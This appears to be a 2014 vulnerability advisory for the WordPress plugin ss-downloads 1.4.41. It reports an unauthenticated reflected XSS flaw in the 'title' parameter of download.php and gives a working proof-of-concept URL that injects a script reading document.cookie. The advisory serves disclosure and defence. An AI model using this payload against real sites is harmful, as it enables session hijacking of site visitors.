wp-plugin : ss-downloads

Plugin Details
Plugin Name: wp-plugin : ss-downloads
Effected Version : 1.4.41 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

PoC:
http://localhost/wordpress/wp-content/wp-plugs/ss-downloads/templates/download.php?title=title%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Vulnerable Parameter :title


Disclosure Timeline
Vendor Contacted : 2014-01-21
Plugin Status : Updated on 2014-01-21
Public Disclosure : May 28, 2014
CVE Number :
Plugin Description :
[| Adds a short code like [download file="path_to_file"] that embeds a form in the post asking for an email address before showing a link to a file for download. Great for promoting white papers and other digital assets on your site. Live demo: http://www.strangerstudios.com/blog/2010/07/ss-downloads-wordpress-plugin/ The plugin works in 3 parts. 1. The short code to add the form to your pages. 2. The logic to check (using session variables) if the user has provided an email address before showing either the email capture form or the download link. 3. A script to serve files securely. It checks for the same session variable before delivering the file. Files can be located outside the web directory or servered from the uploads folder, etc, with an obfuscated URL. The look of the email and download forms can be changed by copying files from the /css/ and /templates/ folder of the plugin into your active theme folder. Rename the files ssd-original_file_name.php/css (e.g. ssd-download.php or ssd-ss-downloads.css) and edit as needed. ]